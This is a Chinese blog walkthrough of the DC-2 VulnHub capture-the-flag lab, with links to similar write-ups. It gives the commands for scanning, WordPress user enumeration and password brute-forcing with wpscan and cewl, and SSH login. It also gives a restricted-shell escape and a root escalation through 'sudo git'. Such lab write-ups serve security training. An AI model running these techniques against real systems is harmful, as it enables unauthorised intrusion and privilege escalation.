DC-2 靶机

最新推荐文章于 2024-03-03 20:01:53 发布
最新推荐文章于 2024-03-03 20:01:53 发布
阅读量5.4k 收藏
点赞数 2
文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63492470/article/details/123429279
版权

DC-2靶机下载地址: DC-2 | Five86 | DC Challenges

环境:DC-2靶机地址:192.168.1.139

nmap -sP 192.168.1.0/24    查看ip
nmap -A 192.168.1.139      #这里我的靶机IP是132
dirb 192.168.1.139         爆破目录

这里查出了靶机IP为192.168.1.139 靶机开放了80端口和7744端口、

然后访问192.168.1.139发现是这个界面,什么也没有看到

(通常是解析造成的)在hosts文件添加对应的ip和域名 保存并退出

vim /etc/hosts

然后访问192.168.1.139

往下滑发现flag1

根据提示,搜索cewl,发现是一个kali自带的密码生成工具

wpscan --url http://dc-2 --enumerate u  #扫出dc-2的用户  admin  Jerry  tom
vim dc-2_user.txt    #将用户写入该文件
cat dc-2_user.txt    #查看该文件
cewl -w dc2-passwords.txt http://dc-2   将cewl生成的密码写进password

使用wpscan进行爆破

wpscan --ignore-main-redirect --url 192.168.1.139 -U dc-2_user.txt -P dc2-passwords.txt --force

爆出两个用户名和密码

然后用ssh对其中一个进行连接,输入密码

ssh tom@192.168.1.132 -p 7744

接着,,,

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

找到flag3

切换到Jerry用户找到flag4

flag4 提示我们可以使用git,我们可以通过git来提权

sudo -l
sudo git -p help

然后弹出一堆东西最后是个冒号,我们在冒号后面输入

! /bin/bash

然后就到了root用户再输入id ,whoami查看自己的成果

 祝你有一个美好的一天!!!

一事无成的Fw.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub-DC-2渗透学习
m0_61996125的博客
06-11 678
​环境搭建 攻击机:Kali-2021.3:192.168.8.105 靶机:Vulnhub-DC2:192.168.8.222 靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip ​
vulnhub靶机DC-2
Keepb1ue的博客
09-29 2592
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
DC-2靶机详解
最新发布
苏生要努力
03-03 1178
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1415
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
2022-渗透测试-DC靶场的下载、安装与访问
保持微笑的博客
02-03 4757
目录 1.DC靶场下载 2.DC靶场的安装 3.DC靶场的访问 1.DC靶场下载 下载链接如下 Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。 2.DC靶场的安装 以DC-1为例,将文件解压。 打开虚拟机,选择解压好的文件 导入虚拟机 ...
vulnhub之DC2靶机
LainWith的博客
08-16 1433
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 482
下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4227
dc-9靶场详细渗透过程
dc-2 靶机渗透学习
..
03-15 1295
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
DC系列】DC-2靶机实战详细讲解
weixin_44681307的博客
06-28 355
wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了。然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了。
看完这篇 教你玩转渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3688
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
靶机DC-2 WP
m0_66638011的博客
05-13 520
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
DC-2靶机
Flamingo1998的博客
02-09 213
DC-2靶机
渗透DC-1靶机设计思路
05-24
2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值